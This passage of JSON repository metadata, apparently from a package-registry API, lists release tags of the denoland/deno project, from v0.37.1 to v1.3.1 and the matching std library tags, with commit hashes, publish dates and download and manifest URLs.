0Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.67.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0/manifests"},{"name":"v1.3.1","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1/manifests"},{"name":"std/0.66.0","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.66.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0/manifests"},{"name":"v1.3.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0/manifests"},{"name":"std/0.65.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.65.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0/manifests"},{"name":"v1.2.3","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3/manifests"},{"name":"std/0.64.0","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.64.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0/manifests"},{"name":"v1.2.2","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2/manifests"},{"name":"std/0.63.0","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.63.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0/manifests"},{"name":"v1.2.1","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1/manifests"},{"name":"std/0.62.0","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.62.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0/manifests"},{"name":"v1.2.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0/manifests"},{"name":"std/0.61.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.61.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0/manifests"},{"name":"v1.1.3","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3/manifests"},{"name":"std/0.60.0","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.60.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0/manifests"},{"name":"v1.1.2","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2/manifests"},{"name":"std/0.59.0","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.59.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0/manifests"},{"name":"v1.1.1","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1/manifests"},{"name":"std/0.58.0","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.58.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0/manifests"},{"name":"v1.1.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0/manifests"},{"name":"std/0.57.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.57.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0/manifests"},{"name":"v1.0.5","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5/manifests"},{"name":"std/0.56.0","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.56.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0/manifests"},{"name":"v1.0.4","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4/manifests"},{"name":"std/0.55.0","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.55.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0/manifests"},{"name":"v1.0.3","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3/manifests"},{"name":"std/0.54.0","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.54.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0/manifests"},{"name":"std/0.53.0","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.53.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0/manifests"},{"name":"v1.0.2","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2/manifests"},{"name":"v1.0.1","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1/manifests"},{"name":"std/0.52.0","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.52.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0/manifests"},{"name":"std/0.51.0","sha":"c474d383543708fc636c06dd2e4a9100495f45c5","kind":"commit","published_at":"2020-05-14T11:45:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.51.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0/manifests"},{"name":"v1.0.0","sha":"55d2c6bd103879263c115fa5697f3cf3101158f4","kind":"commit","published_at":"2020-05-13T22:07:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc3","sha":"35e8bc8de65b523e082d446dc25f114ed81264a8","kind":"commit","published_at":"2020-05-12T12:33:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"d8f5b37218715bbc624eb53dd4b7409867b2c803","kind":"commit","published_at":"2020-05-09T19:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2/manifests"},{"name":"std/0.50.0","sha":"d5dd5ae87d7598643a46f27fa4a11b2a85d42be8","kind":"commit","published_at":"2020-05-09T13:15:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.50.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0/manifests"},{"name":"v1.0.0-rc1","sha":"5f67a202ff59f25ea183c261f664a6db06407e17","kind":"commit","published_at":"2020-05-04T19:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1/manifests"},{"name":"v0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0/manifests"},{"name":"std/0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0/manifests"},{"name":"v0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0/manifests"},{"name":"std/0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0/manifests"},{"name":"v0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0/manifests"},{"name":"std/0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0/manifests"},{"name":"v0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0/manifests"},{"name":"std/0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0/manifests"},{"name":"v0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0/manifests"},{"name":"std/0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0/manifests"},{"name":"v0.37.1","sha":"b924e5ab7e69eab4d3b6d9a863a8fc2974f33b5d","kind":"commit","published_at":"2020-03-23T21:14:34.000Z","download_url":"https://codeload.g